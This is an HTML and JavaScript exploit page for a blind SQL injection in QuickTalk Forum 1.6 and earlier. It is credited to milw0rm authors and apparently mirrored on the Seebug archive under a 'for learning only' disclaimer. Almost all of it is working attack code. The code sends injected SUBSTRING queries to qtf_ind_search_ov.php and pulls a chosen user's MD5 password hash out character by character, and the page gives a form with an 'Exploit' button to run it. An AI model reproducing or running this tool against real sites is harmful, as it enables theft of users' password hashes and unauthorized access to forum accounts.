<html> <head> <title>QuickTalk Forum <= 1.6 Blind SQL Injection Exploit</title> <script language="Javascript" type="text/javascript"> /* ----------------------------------------------------------------------------------------------- - QuickTalk Forum Blind SQL Injection Exploit (qtf_ind_search_ov.php) - - Info --------------------------------------------------------------------------------------- - Author: t0pP8uZz & xprog ----------------------------------------------------------- - Exploit Coded By t0pP8uZz --------------------------------------------------------- - Site: h4ck-y0u.org / milw0rm.com ------------------------------------------------ ---------------------------------------------------------------------------------------------- - Passwords ARE IN MD5 ---------------------------------------------------- - Peace ----------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------- */ var site, uid, res = ""; function Start() { site = document.getElementById("site").value; uid = document.getElementById("pid").value; document.getElementById("output").value = "Exploiting, Please Wait.."; Main(1, 48); } function Main(substr, num) { var xmlhttp = false; var url = site+"/qtf_ind_search_ov.php?a=user&id=1 and ASCII(SUBSTRING((SELECT pwd FROM qtiuser WHERE id="+uid+" LIMIT 0,1),"+substr+",1))="+num+"/*"; try { xmlhttp = new XMLHttpRequest(); } catch(e) { alert("Unsupported Browser! Run Exploit In Mozilla Firefox!"); } if(xmlhttp) { netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead"); xmlhttp.onreadystatechange = function() { if(xmlhttp.readyState == 4) { var content = xmlhttp.responseText; var ele = document.getElementById("output"); if(!content.match(/0 Found/i)) { res += String.fromCharCode(num); ele.value = res; num = 48; substr++; } else { if(num == 59) { num = 96; } else { num++; } } if(res.length >= 32) { alert("Exploitation Successfull!. Admin MD5 Hash: "+res); return true; } Main(substr, num) } }; xmlhttp.open("GET", url, true); xmlhttp.send(null); } } </script> <style type="text/css"> <!-- .style1{color: #CC0000} .style2 { color: #000000; font-size: 12px;} .style3 {color: #FF0000; font-weight: bold; font-size: 12px; } .style4 {color: #FF0000; font-size: 10px;} --> </style> </head> <body> <p class="style1">- QuickTalk Forum <= 1.6 Blind SQL Injection Exploit -</p> <p class="style2">Site: <input type="text" id="site" /> (URL to QuickTalk Forum site ie: http://www.site.com/quicktalkforum)</p> <p class="style2">User: <input type="text" id="pid" /> (UserID of the user you want the MD5 hash too.)</p> <p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p> <p class="style3">Output (MD5 Hash): <input type="text" id="output" size="100" /></p> (Do not touch untill exploit says its done) <p class="style2">Notes: QuickTalk Forum uses the MD5 algorithms to encrypt passwords</p> <p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p> </body> </html> # milw0rm.com [2008-03-12]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论